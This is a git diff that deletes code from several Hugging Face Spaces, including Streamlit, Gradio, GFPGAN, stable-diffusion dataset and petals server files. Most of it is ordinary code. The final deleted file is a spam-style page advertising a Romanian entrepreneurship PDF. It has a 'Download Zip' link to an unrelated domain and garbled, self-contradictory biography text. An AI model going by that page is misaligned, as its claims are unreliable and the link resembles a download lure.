PdfReader(BytesIO(file.getvalue())) - for page in range(len(pdf.pages)): - text += pdf.pages[page].extract_text() # new PyPDF2 syntax - return text - -def txt2chunks(text): - text_splitter = CharacterTextSplitter(separator="\n", chunk_size=1000, chunk_overlap=200, length_function=len) - return text_splitter.split_text(text) - -# Vector Store using FAISS -@st.cache_resource -def vector_store(text_chunks): - embeddings = OpenAIEmbeddings(openai_api_key=key) - return FAISS.from_texts(texts=text_chunks, embedding=embeddings) - -# Memory and Retrieval chains -@st.cache_resource -def get_chain(vectorstore): - llm = ChatOpenAI() - memory = ConversationBufferMemory(memory_key='chat_history', return_messages=True) - return ConversationalRetrievalChain.from_llm(llm=llm, retriever=vectorstore.as_retriever(), memory=memory) - -def process_user_input(user_question): - response = st.session_state.conversation({'question': user_question}) - st.session_state.chat_history = response['chat_history'] - for i, message in enumerate(st.session_state.chat_history): - template = user_template if i % 2 == 0 else bot_template - st.write(template.replace("{{MSG}}", message.content), unsafe_allow_html=True) - filename = generate_filename(user_question, 'txt') - response = message.content - user_prompt = user_question - create_file(filename, user_prompt, response, should_save) - -def divide_prompt(prompt, max_length): - words = prompt.split() - chunks = [] - current_chunk = [] - current_length = 0 - for word in words: - if len(word) + current_length <= max_length: - current_length += len(word) + 1 - current_chunk.append(word) - else: - chunks.append(' '.join(current_chunk)) - current_chunk = [word] - current_length = len(word) - chunks.append(' '.join(current_chunk)) - return chunks - - -# 13. Provide way of saving all and deleting all to give way of reviewing output and saving locally before clearing it - -@st.cache_resource -def create_zip_of_files(files): - zip_name = "all_files.zip" - with zipfile.ZipFile(zip_name, 'w') as zipf: - for file in files: - zipf.write(file) - return zip_name - -@st.cache_resource -def get_zip_download_link(zip_file): - with open(zip_file, 'rb') as f: - data = f.read() - b64 = base64.b64encode(data).decode() - href = f'Download All' - return href - -# 14. Inference Endpoints for Whisper (best fastest STT) on NVIDIA T4 and Llama (best fastest AGI LLM) on NVIDIA A10 -# My Inference Endpoint -API_URL_IE = f'https://tonpixzfvq3791u9.us-east-1.aws.endpoints.huggingface.cloud' -# Original -API_URL_IE = "https://api-inference.huggingface.co/models/openai/whisper-small.en" -MODEL2 = "openai/whisper-small.en" -MODEL2_URL = "https://huggingface.co/openai/whisper-small.en" -#headers = { -# "Authorization": "Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", -# "Content-Type": "audio/wav" -#} -HF_KEY = os.getenv('HF_KEY') -headers = { - "Authorization": f"Bearer {HF_KEY}", - "Content-Type": "audio/wav" -} - -#@st.cache_resource -def query(filename): - with open(filename, "rb") as f: - data = f.read() - response = requests.post(API_URL_IE, headers=headers, data=data) - return response.json() - -def generate_filename(prompt, file_type): - central = pytz.timezone('US/Central') - safe_date_time = datetime.now(central).strftime("%m%d_%H%M") - replaced_prompt = prompt.replace(" ", "_").replace("\n", "_") - safe_prompt = "".join(x for x in replaced_prompt if x.isalnum() or x == "_")[:90] - return f"{safe_date_time}_{safe_prompt}.{file_type}" - -# 15. Audio recorder to Wav file -def save_and_play_audio(audio_recorder): - audio_bytes = audio_recorder() - if audio_bytes: - filename = generate_filename("Recording", "wav") - with open(filename, 'wb') as f: - f.write(audio_bytes) - st.audio(audio_bytes, format="audio/wav") - return filename - -# 16. Speech transcription to file output -def transcribe_audio(filename): - output = query(filename) - return output - -def whisper_main(): - st.title("Speech to Text") - st.write("Record your speech and get the text.") - - # Audio, transcribe, GPT: - filename = save_and_play_audio(audio_recorder) - if filename is not None: - transcription = transcribe_audio(filename) - try: - transcription = transcription['text'] - except: - st.write('Whisper model is asleep. Starting up now on T4 GPU - please give 5 minutes then retry as it scales up from zero to activate running container(s).') - - st.write(transcription) - response = StreamLLMChatResponse(transcription) - # st.write(response) - redundant with streaming result? - filename = generate_filename(transcription, ".txt") - create_file(filename, transcription, response, should_save) - #st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - - -# 17. Main -def main(): - - st.title("AI Drome Llama") - prompt = f"Write ten funny jokes that are tweet length stories that make you laugh. Show as markdown outline with emojis for each." - - # Add Wit and Humor buttons - add_witty_humor_buttons() - - example_input = st.text_input("Enter your example text:", value=prompt, help="Enter text to get a response from DromeLlama.") - if st.button("Run Prompt With DromeLlama", help="Click to run the prompt."): - try: - StreamLLMChatResponse(example_input) - except: - st.write('DromeLlama is asleep. Starting up now on A10 - please give 5 minutes then retry as KEDA scales up from zero to activate running container(s).') - - openai.api_key = os.getenv('OPENAI_KEY') - menu = ["txt", "htm", "xlsx", "csv", "md", "py"] - choice = st.sidebar.selectbox("Output File Type:", menu) - model_choice = st.sidebar.radio("Select Model:", ('gpt-3.5-turbo', 'gpt-3.5-turbo-0301')) - user_prompt = st.text_area("Enter prompts, instructions & questions:", '', height=100) - collength, colupload = st.columns([2,3]) # adjust the ratio as needed - with collength: - max_length = st.slider("File section length for large files", min_value=1000, max_value=128000, value=12000, step=1000) - with colupload: - uploaded_file = st.file_uploader("Add a file for context:", type=["pdf", "xml", "json", "xlsx", "csv", "html", "htm", "md", "txt"]) - document_sections = deque() - document_responses = {} - if uploaded_file is not None: - file_content = read_file_content(uploaded_file, max_length) - document_sections.extend(divide_document(file_content, max_length)) - if len(document_sections) > 0: - if st.button("👁️ View Upload"): - st.markdown("**Sections of the uploaded file:**") - for i, section in enumerate(list(document_sections)): - st.markdown(f"**Section {i+1}**\n{section}") - st.markdown("**Chat with the model:**") - for i, section in enumerate(list(document_sections)): - if i in document_responses: - st.markdown(f"**Section {i+1}**\n{document_responses[i]}") - else: - if st.button(f"Chat about Section {i+1}"): - st.write('Reasoning with your inputs...') - response = chat_with_model(user_prompt, section, model_choice) - st.write('Response:') - st.write(response) - document_responses[i] = response - filename = generate_filename(f"{user_prompt}_section_{i+1}", choice) - create_file(filename, user_prompt, response, should_save) - st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - if st.button('💬 Chat'): - st.write('Reasoning with your inputs...') - user_prompt_sections = divide_prompt(user_prompt, max_length) - full_response = '' - for prompt_section in user_prompt_sections: - response = chat_with_model(prompt_section, ''.join(list(document_sections)), model_choice) - full_response += response + '\n' # Combine the responses - response = full_response - st.write('Response:') - st.write(response) - filename = generate_filename(user_prompt, choice) - create_file(filename, user_prompt, response, should_save) - st.sidebar.markdown(get_table_download_link(filename), unsafe_allow_html=True) - - # Compose a file sidebar of past encounters - all_files = glob.glob("*.*") - all_files = [file for file in all_files if len(os.path.splitext(file)[0]) >= 20] # exclude files with short names - all_files.sort(key=lambda x: (os.path.splitext(x)[1], x), reverse=True) # sort by file type and file name in descending order - if st.sidebar.button("🗑 Delete All"): - for file in all_files: - os.remove(file) - st.experimental_rerun() - if st.sidebar.button("⬇️ Download All"): - zip_file = create_zip_of_files(all_files) - st.sidebar.markdown(get_zip_download_link(zip_file), unsafe_allow_html=True) - file_contents='' - next_action='' - for file in all_files: - col1, col2, col3, col4, col5 = st.sidebar.columns([1,6,1,1,1]) # adjust the ratio as needed - with col1: - if st.button("🌐", key="md_"+file): # md emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='md' - with col2: - st.markdown(get_table_download_link(file), unsafe_allow_html=True) - with col3: - if st.button("📂", key="open_"+file): # open emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='open' - with col4: - if st.button("🔍", key="read_"+file): # search emoji button - with open(file, 'r') as f: - file_contents = f.read() - next_action='search' - with col5: - if st.button("🗑", key="delete_"+file): - os.remove(file) - st.experimental_rerun() - - - if len(file_contents) > 0: - if next_action=='open': - file_content_area = st.text_area("File Contents:", file_contents, height=500) - if next_action=='md': - st.markdown(file_contents) - if next_action=='search': - file_content_area = st.text_area("File Contents:", file_contents, height=500) - st.write('Reasoning with your inputs...') - - # new - llama - response = StreamLLMChatResponse(file_contents) - filename = generate_filename(user_prompt, ".md") - create_file(filename, file_contents, response, should_save) - SpeechSynthesis(response) - - # old - gpt - #response = chat_with_model(user_prompt, file_contents, model_choice) - #filename = generate_filename(file_contents, choice) - #create_file(filename, user_prompt, response, should_save) - - st.experimental_rerun() - - # Feedback - # Step: Give User a Way to Upvote or Downvote - feedback = st.radio("Step 8: Give your feedback", ("👍 Upvote", "👎 Downvote")) - if feedback == "👍 Upvote": - st.write("You upvoted 👍. Thank you for your feedback!") - else: - st.write("You downvoted 👎. Thank you for your feedback!") - - load_dotenv() - st.write(css, unsafe_allow_html=True) - st.header("Chat with documents :books:") - user_question = st.text_input("Ask a question about your documents:") - if user_question: - process_user_input(user_question) - with st.sidebar: - st.subheader("Your documents") - docs = st.file_uploader("import documents", accept_multiple_files=True) - with st.spinner("Processing"): - raw = pdf2txt(docs) - if len(raw) > 0: - length = str(len(raw)) - text_chunks = txt2chunks(raw) - vectorstore = vector_store(text_chunks) - st.session_state.conversation = get_chain(vectorstore) - st.markdown('# AI Search Index of Length:' + length + ' Created.') # add timing - filename = generate_filename(raw, 'txt') - create_file(filename, raw, '', should_save) - -# 18. Run AI Pipeline -if __name__ == "__main__": - whisper_main() - main() \ No newline at end of file diff --git a/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py b/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py deleted file mode 100644 index ec9f05b7f39239dc7adc103c34838c2bce53a663..0000000000000000000000000000000000000000 --- a/spaces/ayush5710/wizard-coder-34b-coding-chatbot/app.py +++ /dev/null @@ -1,145 +0,0 @@ -import json -import os -import shutil -import requests - -import gradio as gr -from huggingface_hub import Repository, InferenceClient - -HF_TOKEN = os.environ.get("HF_TOKEN", None) -API_URL = "https://api-inference.huggingface.co/models/WizardLM/WizardCoder-Python-34B-V1.0" -BOT_NAME = "Wizard" - -STOP_SEQUENCES = ["\nUser:", "<|endoftext|>", " User:", "###"] - -EXAMPLES = [ - ["what are the benefits of programming in python?"], - ["explain binary search in java?"], - ] - -client = InferenceClient( - API_URL, - headers={"Authorization": f"Bearer {HF_TOKEN}"}, -) - -def format_prompt(message, history, system_prompt): - prompt = "" - if system_prompt: - prompt += f"System: {system_prompt}\n" - for user_prompt, bot_response in history: - prompt += f"User: {user_prompt}\n" - prompt += f"Wizard: {bot_response}\n" # Response already contains "Wizard: " - prompt += f"""User: {message} -Wizard:""" - return prompt - -seed = 42 - -def generate( - prompt, history, system_prompt="", temperature=0.4, max_new_tokens=800, top_p=0.95, repetition_penalty=1.5, -): - temperature = float(temperature) - if temperature < 1e-2: - temperature = 1e-2 - top_p = float(top_p) - global seed - generate_kwargs = dict( - temperature=temperature, - max_new_tokens=max_new_tokens, - top_p=top_p, - repetition_penalty=repetition_penalty, - stop_sequences=STOP_SEQUENCES, - do_sample=True, - seed=seed, - ) - seed = seed + 1 - formatted_prompt = format_prompt(prompt, history, system_prompt) - - stream = client.text_generation(formatted_prompt, **generate_kwargs, stream=True, details=True, return_full_text=False) - output = "" - - for response in stream: - output += response.token.text - - for stop_str in STOP_SEQUENCES: - if output.endswith(stop_str): - output = output[:-len(stop_str)] - output = output.rstrip() - yield output - yield output - return output - - -additional_inputs=[ - gr.Textbox("", label="Optional system prompt"), - gr.Slider( - label="Temperature", - value=0.4, - minimum=0.0, - maximum=1.0, - step=0.05, - interactive=True, - info="Higher values produce more diverse outputs", - ), - gr.Slider( - label="Max new tokens", - value=800, - minimum=0, - maximum=8192, - step=64, - interactive=True, - info="The maximum numbers of new tokens", - ), - gr.Slider( - label="Top-p (nucleus sampling)", - value=0.90, - minimum=0.0, - maximum=1, - step=0.05, - interactive=True, - info="Higher values sample more low-probability tokens", - ), - gr.Slider( - label="Repetition penalty", - value=1.5, - minimum=1.0, - maximum=2.0, - step=0.05, - interactive=True, - info="Penalize repeated tokens", - ) -] - - -def vote(data: gr.LikeData): - if data.liked: - print("You upvoted this response: " + data.value) - else: - print("You downvoted this response: " + data.value) - - -chatbot = gr.Chatbot(avatar_images=('user.png', 'bot.png'),bubble_full_width = False) - -chat_interface = gr.ChatInterface( - generate, - chatbot = chatbot, - examples=EXAMPLES, - additional_inputs=additional_inputs, - ) - - -with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - gr.Markdown( - """# Wizard Coder 34b Demo - ## - This app provides a way of using wizard coder via a demo - - ⚠️ **Limitations**: the model can produce factually incorrect information, hallucinating facts and actions. """ - ) - - chatbot.like(vote, None, None) - chat_interface.render() - -demo.queue(concurrency_count=100, api_open=False).launch(show_api=False) \ No newline at end of file diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py b/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py deleted file mode 100644 index 43c7248137807e6458b0e62c42481571795ea9de..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/.history/app_20220327005406.py +++ /dev/null @@ -1,65 +0,0 @@ -import os -#os.system("pip install gfpgan") - -#os.system("pip freeze") -#os.system("wget https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth -P .") -import random -import gradio as gr -from PIL import Image -import torch -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/ab/Abraham_Lincoln_O-77_matte_collodion_print.jpg/1024px-Abraham_Lincoln_O-77_matte_collodion_print.jpg', 'lincoln.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/5/50/Albert_Einstein_%28Nobel%29.png', 'einstein.png') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/9/9d/Thomas_Edison2.jpg/1024px-Thomas_Edison2.jpg', 'edison.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Henry_Ford_1888.jpg/1024px-Henry_Ford_1888.jpg', 'Henry.jpg') -# torch.hub.download_url_to_file('https://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg/800px-Frida_Kahlo%2C_by_Guillermo_Kahlo.jpg', 'Frida.jpg') - - - - -import cv2 -import glob -import numpy as np -from basicsr.utils import imwrite -from gfpgan import GFPGANer - -import warnings -warnings.warn('The unoptimized RealESRGAN is very slow on CPU. We do not use it. ' - 'If you really want to use it, please modify the corresponding codes.') -bg_upsampler = None - - - -# set up GFPGAN restorer -restorer = GFPGANer( - model_path='experiments/pretrained_models/GFPGANv1.3.pth', - upscale=2, - arch='clean', - channel_multiplier=2, - bg_upsampler=bg_upsampler) - - -def inference(img): - input_img = cv2.imread(img, cv2.IMREAD_COLOR) - cropped_faces, restored_faces, restored_img = restorer.enhance( - input_img, has_aligned=False, only_center_face=False, paste_back=True) - - return Image.fromarray(restored_img[0][:,:,::-1]) - -title = "GFP-GAN" -description = "Gradio demo for GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below. Please click submit only once" -article = "

    Towards Real-World Blind Face Restoration with Generative Facial Prior | Github Repo

    visitor badge
    " -gr.Interface( - inference, - [gr.inputs.Image(type="filepath", label="Input")], - gr.outputs.Image(type="pil", label="Output"), - title=title, - description=description, - article=article, - examples=[ - ['lincoln.jpg'], - ['einstein.png'], - ['edison.jpg'], - ['Henry.jpg'], - ['Frida.jpg'] - ] - ).launch(enable_queue=True,cache_examples=True) \ No newline at end of file diff --git a/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py b/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py deleted file mode 100644 index 2a89fa19125b471e5ab2f67ab86b63e6704b5a32..0000000000000000000000000000000000000000 --- a/spaces/beihai/GFPGAN-V1.3-whole-image/basicsr/version.py +++ /dev/null @@ -1,5 +0,0 @@ -# GENERATED VERSION FILE -# TIME: Wed Mar 16 21:28:35 2022 -__version__ = '1.3.5' -__gitsha__ = '6697f41' -version_info = (1, 3, 5) diff --git a/spaces/bigPear/digitalWDF/app.py b/spaces/bigPear/digitalWDF/app.py deleted file mode 100644 index 7300ed25e2e0fb1c51535ca7a622c524946fd71f..0000000000000000000000000000000000000000 --- a/spaces/bigPear/digitalWDF/app.py +++ /dev/null @@ -1,41 +0,0 @@ -import sys -from transformers import AutoModel, AutoTokenizer -import gradio as gr -sys.path.append("src") -from src import load_pretrained, ModelArguments - -# if __name__ == "__main__": -model_args = ModelArguments(checkpoint_dir="combined") -model, tokenizer = load_pretrained(model_args) -model = model.half().cuda() -model = model.eval() - -import time - -def predict(input, history=None): - if history is None: - history = [] - response, _ = model.chat(tokenizer, input, history) - history[-1][1] = "" - for character in response: - history[-1][1] += character - time.sleep(0.05) - yield history - -with gr.Blocks() as demo: - gr.Markdown('''## DigitalWDF - unofficial demo - ''') - chatbot = gr.Chatbot([], elem_id="chatbot").style(height=200) - - - def user(user_message, history): - return history + [[user_message, None]] - - with gr.Row(): - with gr.Column(scale=4): - txt = gr.Textbox(show_label=False, placeholder="Enter text and press enter").style(container=False) - with gr.Column(scale=1): - button = gr.Button("Generate") - txt.submit(user, [txt, chatbot], chatbot, queue=False).then(predict, [txt, chatbot], chatbot) - button.click(user, [txt, chatbot], chatbot, queue=False).then(predict, [txt, chatbot], chatbot) -demo.queue().launch() \ No newline at end of file diff --git a/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py b/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py deleted file mode 100644 index 093efcd4fc70602a802a82bc50457d0a5d08b5e2..0000000000000000000000000000000000000000 --- a/spaces/bigjoker/stable-diffusion-webui/modules/textual_inversion/dataset.py +++ /dev/null @@ -1,246 +0,0 @@ -import os -import numpy as np -import PIL -import torch -from PIL import Image -from torch.utils.data import Dataset, DataLoader, Sampler -from torchvision import transforms -from collections import defaultdict -from random import shuffle, choices - -import random -import tqdm -from modules import devices, shared -import re - -from ldm.modules.distributions.distributions import DiagonalGaussianDistribution - -re_numbers_at_start = re.compile(r"^[-\d]+\s*") - - -class DatasetEntry: - def __init__(self, filename=None, filename_text=None, latent_dist=None, latent_sample=None, cond=None, cond_text=None, pixel_values=None, weight=None): - self.filename = filename - self.filename_text = filename_text - self.weight = weight - self.latent_dist = latent_dist - self.latent_sample = latent_sample - self.cond = cond - self.cond_text = cond_text - self.pixel_values = pixel_values - - -class PersonalizedBase(Dataset): - def __init__(self, data_root, width, height, repeats, flip_p=0.5, placeholder_token="*", model=None, cond_model=None, device=None, template_file=None, include_cond=False, batch_size=1, gradient_step=1, shuffle_tags=False, tag_drop_out=0, latent_sampling_method='once', varsize=False, use_weight=False): - re_word = re.compile(shared.opts.dataset_filename_word_regex) if len(shared.opts.dataset_filename_word_regex) > 0 else None - - self.placeholder_token = placeholder_token - - self.flip = transforms.RandomHorizontalFlip(p=flip_p) - - self.dataset = [] - - with open(template_file, "r") as file: - lines = [x.strip() for x in file.readlines()] - - self.lines = lines - - assert data_root, 'dataset directory not specified' - assert os.path.isdir(data_root), "Dataset directory doesn't exist" - assert os.listdir(data_root), "Dataset directory is empty" - - self.image_paths = [os.path.join(data_root, file_path) for file_path in os.listdir(data_root)] - - self.shuffle_tags = shuffle_tags - self.tag_drop_out = tag_drop_out - groups = defaultdict(list) - - print("Preparing dataset...") - for path in tqdm.tqdm(self.image_paths): - alpha_channel = None - if shared.state.interrupted: - raise Exception("interrupted") - try: - image = Image.open(path) - #Currently does not work for single color transparency - #We would need to read image.info['transparency'] for that - if use_weight and 'A' in image.getbands(): - alpha_channel = image.getchannel('A') - image = image.convert('RGB') - if not varsize: - image = image.resize((width, height), PIL.Image.BICUBIC) - except Exception: - continue - - text_filename = os.path.splitext(path)[0] + ".txt" - filename = os.path.basename(path) - - if os.path.exists(text_filename): - with open(text_filename, "r", encoding="utf8") as file: - filename_text = file.read() - else: - filename_text = os.path.splitext(filename)[0] - filename_text = re.sub(re_numbers_at_start, '', filename_text) - if re_word: - tokens = re_word.findall(filename_text) - filename_text = (shared.opts.dataset_filename_join_string or "").join(tokens) - - npimage = np.array(image).astype(np.uint8) - npimage = (npimage / 127.5 - 1.0).astype(np.float32) - - torchdata = torch.from_numpy(npimage).permute(2, 0, 1).to(device=device, dtype=torch.float32) - latent_sample = None - - with devices.autocast(): - latent_dist = model.encode_first_stage(torchdata.unsqueeze(dim=0)) - - #Perform latent sampling, even for random sampling. - #We need the sample dimensions for the weights - if latent_sampling_method == "deterministic": - if isinstance(latent_dist, DiagonalGaussianDistribution): - # Works only for DiagonalGaussianDistribution - latent_dist.std = 0 - else: - latent_sampling_method = "once" - latent_sample = model.get_first_stage_encoding(latent_dist).squeeze().to(devices.cpu) - - if use_weight and alpha_channel is not None: - channels, *latent_size = latent_sample.shape - weight_img = alpha_channel.resize(latent_size) - npweight = np.array(weight_img).astype(np.float32) - #Repeat for every channel in the latent sample - weight = torch.tensor([npweight] * channels).reshape([channels] + latent_size) - #Normalize the weight to a minimum of 0 and a mean of 1, that way the loss will be comparable to default. - weight -= weight.min() - weight /= weight.mean() - elif use_weight: - #If an image does not have a alpha channel, add a ones weight map anyway so we can stack it later - weight = torch.ones(latent_sample.shape) - else: - weight = None - - if latent_sampling_method == "random": - entry = DatasetEntry(filename=path, filename_text=filename_text, latent_dist=latent_dist, weight=weight) - else: - entry = DatasetEntry(filename=path, filename_text=filename_text, latent_sample=latent_sample, weight=weight) - - if not (self.tag_drop_out != 0 or self.shuffle_tags): - entry.cond_text = self.create_text(filename_text) - - if include_cond and not (self.tag_drop_out != 0 or self.shuffle_tags): - with devices.autocast(): - entry.cond = cond_model([entry.cond_text]).to(devices.cpu).squeeze(0) - groups[image.size].append(len(self.dataset)) - self.dataset.append(entry) - del torchdata - del latent_dist - del latent_sample - del weight - - self.length = len(self.dataset) - self.groups = list(groups.values()) - assert self.length > 0, "No images have been found in the dataset." - self.batch_size = min(batch_size, self.length) - self.gradient_step = min(gradient_step, self.length // self.batch_size) - self.latent_sampling_method = latent_sampling_method - - if len(groups) > 1: - print("Buckets:") - for (w, h), ids in sorted(groups.items(), key=lambda x: x[0]): - print(f" {w}x{h}: {len(ids)}") - print() - - def create_text(self, filename_text): - text = random.choice(self.lines) - tags = filename_text.split(',') - if self.tag_drop_out != 0: - tags = [t for t in tags if random.random() > self.tag_drop_out] - if self.shuffle_tags: - random.shuffle(tags) - text = text.replace("[filewords]", ','.join(tags)) - text = text.replace("[name]", self.placeholder_token) - return text - - def __len__(self): - return self.length - - def __getitem__(self, i): - entry = self.dataset[i] - if self.tag_drop_out != 0 or self.shuffle_tags: - entry.cond_text = self.create_text(entry.filename_text) - if self.latent_sampling_method == "random": - entry.latent_sample = shared.sd_model.get_first_stage_encoding(entry.latent_dist).to(devices.cpu) - return entry - - -class GroupedBatchSampler(Sampler): - def __init__(self, data_source: PersonalizedBase, batch_size: int): - super().__init__(data_source) - - n = len(data_source) - self.groups = data_source.groups - self.len = n_batch = n // batch_size - expected = [len(g) / n * n_batch * batch_size for g in data_source.groups] - self.base = [int(e) // batch_size for e in expected] - self.n_rand_batches = nrb = n_batch - sum(self.base) - self.probs = [e%batch_size/nrb/batch_size if nrb>0 else 0 for e in expected] - self.batch_size = batch_size - - def __len__(self): - return self.len - - def __iter__(self): - b = self.batch_size - - for g in self.groups: - shuffle(g) - - batches = [] - for g in self.groups: - batches.extend(g[i*b:(i+1)*b] for i in range(len(g) // b)) - for _ in range(self.n_rand_batches): - rand_group = choices(self.groups, self.probs)[0] - batches.append(choices(rand_group, k=b)) - - shuffle(batches) - - yield from batches - - -class PersonalizedDataLoader(DataLoader): - def __init__(self, dataset, latent_sampling_method="once", batch_size=1, pin_memory=False): - super(PersonalizedDataLoader, self).__init__(dataset, batch_sampler=GroupedBatchSampler(dataset, batch_size), pin_memory=pin_memory) - if latent_sampling_method == "random": - self.collate_fn = collate_wrapper_random - else: - self.collate_fn = collate_wrapper - - -class BatchLoader: - def __init__(self, data): - self.cond_text = [entry.cond_text for entry in data] - self.cond = [entry.cond for entry in data] - self.latent_sample = torch.stack([entry.latent_sample for entry in data]).squeeze(1) - if all(entry.weight is not None for entry in data): - self.weight = torch.stack([entry.weight for entry in data]).squeeze(1) - else: - self.weight = None - #self.emb_index = [entry.emb_index for entry in data] - #print(self.latent_sample.device) - - def pin_memory(self): - self.latent_sample = self.latent_sample.pin_memory() - return self - -def collate_wrapper(batch): - return BatchLoader(batch) - -class BatchLoaderRandom(BatchLoader): - def __init__(self, data): - super().__init__(data) - - def pin_memory(self): - return self - -def collate_wrapper_random(batch): - return BatchLoaderRandom(batch) \ No newline at end of file diff --git a/spaces/bigscience/petals-api/cli/run_server.py b/spaces/bigscience/petals-api/cli/run_server.py deleted file mode 100644 index 2e93a6699fa82d0ce0d80a4016d4996ca1d4092b..0000000000000000000000000000000000000000 --- a/spaces/bigscience/petals-api/cli/run_server.py +++ /dev/null @@ -1,85 +0,0 @@ -import configargparse -from hivemind.proto.runtime_pb2 import CompressionType -from hivemind.utils.limits import increase_file_limit -from hivemind.utils.logging import get_logger, use_hivemind_log_handler - -from src.server.server import Server - -use_hivemind_log_handler("in_root_logger") -logger = get_logger(__file__) - - -def main(): - # fmt:off - parser = configargparse.ArgParser(default_config_files=["config.yml"]) - parser.add('-c', '--config', required=False, is_config_file=True, help='config file path') - - parser.add_argument('--converted_model_name_or_path', type=str, default='bigscience/test-bloomd-6b3', - help="path or name of a pretrained model, converted with cli/convert_model.py (see README.md)") - parser.add_argument('--num_blocks', type=int, default=None, help="The number of blocks to serve") - parser.add_argument('--block_indices', type=str, default=None, help="Specific block indices to serve") - parser.add_argument('--prefix', type=str, default=None, help="Announce all blocks with this prefix. By default," - "use the same name as in the converted model.") - parser.add_argument('--host_maddrs', nargs='+', default=['/ip4/0.0.0.0/tcp/0'], required=False, - help='Multiaddrs to listen for external connections from other p2p instances; default: all IPv4 and TCP: /ip4/0.0.0.0/tcp/0') - parser.add_argument('--announce_maddrs', nargs='+', default=None, required=False, - help='Visible multiaddrs the host announces for external connections from other p2p instances') - - parser.add_argument('--compression', type=str, default='NONE', required=False, help='Tensor compression communication') - - parser.add_argument('--num_handlers', type=int, default=None, required=False, - help='server will use this many processes to handle incoming requests') - parser.add_argument('--min_batch_size', type=int, default=1, - help='Minimum required batch size for all expert operations') - parser.add_argument('--max_batch_size', type=int, default=16384, - help='The total number of examples in the same batch will not exceed this value') - parser.add_argument('--cache_size_bytes', type=int, default=None, - help='The size of memory cache for storing past attention keys/values between inference steps') - parser.add_argument('--device', type=str, default=None, required=False, - help='all experts will use this device in torch notation; default: cuda if available else cpu') - parser.add_argument("--torch_dtype", type=str, default="auto", - help="Use this dtype to store block weights and do computations. " - "By default, respect the dtypes in the pre-trained state dict.") - - parser.add_argument('--update_period', type=float, required=False, default=30, - help='Server will report experts to DHT once in this many seconds') - parser.add_argument('--expiration', type=float, required=False, default=None, - help='DHT entries will expire after this many seconds') - parser.add_argument('--initial_peers', type=str, nargs='*', required=False, default=[], - help='multiaddrs of one or more active DHT peers (if you want to join an existing DHT)') - parser.add_argument('--increase_file_limit', action='store_true', - help='On *nix, this will increase the max number of processes ' - 'a server can spawn before hitting "Too many open files"; Use at your own risk.') - parser.add_argument('--stats_report_interval', type=int, required=False, - help='Interval between two reports of batch processing performance statistics') - - parser.add_argument('--custom_module_path', type=str, required=False, - help='Path of a file with custom nn.modules, wrapped into special decorator') - parser.add_argument('--identity_path', type=str, required=False, help='Path to identity file to be used in P2P') - parser.add_argument("--use_auth_token", type=str, default=None, help="auth token for from_pretrained") - - # fmt:on - args = vars(parser.parse_args()) - args.pop("config", None) - - if args.pop("increase_file_limit"): - increase_file_limit() - - compression_type = args.pop("compression") - compression = getattr(CompressionType, compression_type) - - use_auth_token = args.pop("use_auth_token") - args["use_auth_token"] = True if use_auth_token in ("True", "true", "") else use_auth_token - - server = Server.create(**args, start=True, compression=compression) - - try: - server.join() - except KeyboardInterrupt: - logger.info("Caught KeyboardInterrupt, shutting down") - finally: - server.shutdown() - - -if __name__ == "__main__": - main() diff --git a/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md b/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md deleted file mode 100644 index 388e6c04b090550578c7eb859607368e2d9d6d4e..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Carte Antreprenoriat Marius Ghenea.pdf.md +++ /dev/null @@ -1,16 +0,0 @@ -

    Carte Antreprenoriat Marius Ghenea.pdf


    Download Zip ===> https://urloso.com/2uyRjb



    - -Download and read Marius Ghenea – Carte antreprenoriat Marius Ghenea – Carte antreprenoriat - The real world of entrepreneurship and business podcast – Marius Ghenea English. Marius Ghenea is among other things – serial entrepreneur and business. Marius Ghenea has not yet updated his profile. Marius Ghenea is the son of Marius Ghenea, industrialist and bibliophile. Marius Ghenea started a company called Ghenea in 1980, with two partners. The partners got into contact with the Batzla Project which was headed by Giovanni della Casa from 1980 to 1985. In the summer of 1981 a series of first exchanges took place with the Batzla project. The conditions for the. - -I have also got experience in law in the area of information technology and the right to privacy, law, administration, contract and organisation. The information we gathered in the call-center interviews. Ghenea, chairman and CEO of Orion – A software company that develops integrated marketing technology software for the retail industry. - -Ghenea holds a MBA degree from the University of Pisa and has completed the Executive education program for Sales and Marketing of the EU (Universit. Ghenea came to the U. The future of the industry of books will be about two companies. Ghenea with his partner Moratelli Fiere the founder of Batzla project in Siena. - -Ghenea and his family were refugees from Romania. The Carte antreprenoriat Marius Ghenea http: Marius Ghenea son of Marius Ghenea started in 1980 with two partners: Marius Ghenea was born in Bucharest and emigrated to Italy. Ghenea owns two firms, one in Italy and one in Portugal. Carte antreprenoriat 